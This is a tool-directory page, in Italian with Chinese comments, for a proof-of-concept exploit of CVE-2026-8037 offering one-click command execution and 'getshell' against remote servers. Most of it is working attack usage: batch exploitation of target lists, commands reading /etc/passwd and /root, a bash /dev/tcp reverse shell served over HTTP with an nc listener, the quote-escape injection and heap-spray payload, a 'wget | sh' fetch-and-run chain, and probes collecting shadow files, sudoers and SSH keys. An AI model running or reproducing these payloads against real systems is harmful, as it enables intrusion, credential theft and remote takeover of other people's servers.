Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-8037-POC — Include rilevamento di comandi eseguibili e getshell con un clic (richiede servizio di distribuzione server) | Kitploit
Strumenti/GitHubGitHub/caster-chen/cve-2026-8037-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubcaster-chen/cve-2026-8037-poc

CVE-2026-8037-POC

Include rilevamento di comandi eseguibili e getshell con un clic (richiede servizio di distribuzione server)

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-8037-POC

Include comando detect e getshell con un clic (richiede servizio di deployment server) pco.yaml combinato con nuclei per una rapida rilevazione

Avvio rapido

Modalità interattiva

root@kitploit:~
python go.py

Inserisci l'URL di destinazione → seleziona il menu delle funzioni.

Rilevazione obiettivo

root@kitploit:~
# 快速探测(8 项基本信息)
python go.py -t https://IP:PORT --probe fast

# 深度探测(全部命令:30+ 项)
python go.py -t https://IP:PORT --probe deep

# 批量探测
python go.py -f vulnerable_targets.txt --probe fast

Esecuzione comandi

root@kitploit:~
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"

# 批量并发(20 线程)
python go.py -f targets.txt -c "hostname" --batch 20

Reverse shell con un clic

Sulla macchina attaccante apri due terminali:

root@kitploit:~
# 终端 1 - HTTP 服务(提供 rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087

# 终端 2 - 等待反弹
nc -lvnp 8088

Quindi invia il payload:

root@kitploit:~
# 单目标
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088

# 批量(串行,一次只能接一个)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088

Lo script stamperà i passaggi preparativi prima dell'invio.


Contenuto della rilevazione approfondita


Principio dell'iniezione

root@kitploit:~
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
 "g0":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'; <命令> #", ...}
  • apiuser="''''" scatena il bug di escape_quotes() senza terminazione null
  • g0~g60 heap spray 61 volte, aumenta il tasso di successo
  • '; <命令> # chiude il contesto, # commenta il resto

Limite di lunghezza

Senza echo tag si hanno 34 caratteri:

root@kitploit:~
wget -O- IP:PORT|sh    (31 字符)

Catena di pipe: wget scarica → sh esegue → bash rimbalza sulla porta specificata.


Riepilogo parametri

Scarica lo strumento
CategoriaComando
Informazioni di basehostname, uname -a, kernel, OS release, uptime
Utentiid, whoami, users/w/who
Reteifconfig, route, arp, listening ports, connections, iptables
Sistemaprocesses, cpuinfo, meminfo, disk, mount
Filels / /root /tmp /home /etc
Configurazionecrontab, passwd, shadow, sudoers, SSH keys
Estensioneconfig search, scripts, docker, containers
ParametroDescrizione
-t, --target URLIndirizzo di destinazione
-f, --file FILEFile con elenco di destinazioni
-l, --lhost IPIP della macchina attaccante
-p, --lport PORTPorta del servizio HTTP (default 8087)
-n, --ncport PORTPorta di ascolto nc (default 8088)
-c, --cmd CMDEsegui comando
--probe fast/deepRilevazione rapida/approfondita
--batch NNumero di esecuzioni parallele (default seriale)